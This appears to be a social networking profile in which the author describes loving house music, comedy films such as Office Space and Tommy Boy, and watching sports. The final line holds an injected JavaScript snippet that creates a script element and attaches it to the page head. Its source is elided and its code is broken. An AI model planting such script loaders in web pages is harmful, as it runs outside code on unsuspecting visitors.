Andy Caldwell Johnny FiascoRick PrestonMuisc With grooving Beats...My Family and Friends, Traveling, Meeting New People That are Positive.
Other music lovers and positive people with no hidden agenda's and I wont lie I would like to meet some beautiful women for friendship:)
Ben Watt Yes Please! I love all kinds of Music except country, my Favorite is House music. House music with some grooving beats and a sick ass bass line thats makes your toes start tapping and you just want to start grooving. Im always searching for new music and love turning people on to music they have never heard and love being turned on to new music myself, Im more then likely grooving to something right now.
Anything that gets me laughing, I love to laugh and when you cant stop thats the best. Swingers, Tommy Boy, Office space, Old School, Napoleon Dynamite, Friday, Theres something about mary, Stuck on you, 40 Year Old Virgin and a good action flick too, Scarface Ive got to throw that in there!
Not much of a TV watcher but I do love to watch sporting events.
whats a book? Joking but Im not much of a reader other then the daily sports page and a few good magazines.
My Mother....God Rest Her Soul! .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"